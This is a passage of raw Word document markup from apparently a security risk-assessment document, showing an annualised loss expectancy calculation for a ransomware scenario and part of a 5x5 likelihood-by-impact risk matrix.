          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ALE Calculation — Ransomware Scenario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">GOOGLE SHEETS FORMULA:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Cell A2: "Asset Value (AV)"          B2: 50000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Cell A3: "Exposure Factor (EF)"      B3: 0.20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Cell A4: "SLE = AV × EF"            B4: =B2*B3        → $10,000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Cell A5: "ARO (Annual Rate)"         B5: 0.20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Cell A6: "ALE = SLE × ARO"          B6: =B4*B5        → $2,000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">RESULT: ALE = $2,000 per year</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">DECISION: Controls costing up to $2,000/year are cost-justified</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5x5 Risk Matrix — Ransomware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12"/>
        <w:gridCol w:w="1512"/>
        <w:gridCol w:w="1512"/>
        <w:gridCol w:w="1512"/>
        <w:gridCol w:w="1512"/>
      </w:tblGrid>
      <w:t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Likelihood \ Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:left w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:bottom w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:right w:val="single" w:color="2E75B6" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">1-Negligible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:left w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:bottom w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:right w:val="single" w:color="2E75B6" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">2-Minor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:left w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:bottom w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:right w:val="single" w:color="2E75B6" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">3-Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:left w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:bottom w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:right w:val="single" w:color="2E75B6" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">4-Major</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:left w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:bottom w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:right w:val="single" w:color="2E75B6" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">5-Critical</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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5-Almost Certain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>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val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFE0B2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFE0B2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FCE4EC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FCE4EC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">25*</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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4-Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>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pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>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val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFE0B2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFE0B2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FCE4EC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">20</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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3-Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>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pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>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val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>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val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFE0B2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFE0B2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">15</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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2-Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>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pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>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pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>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val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>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bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">8*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFE0B2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">10</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3864"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1-Rare</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>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pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>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pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>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pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
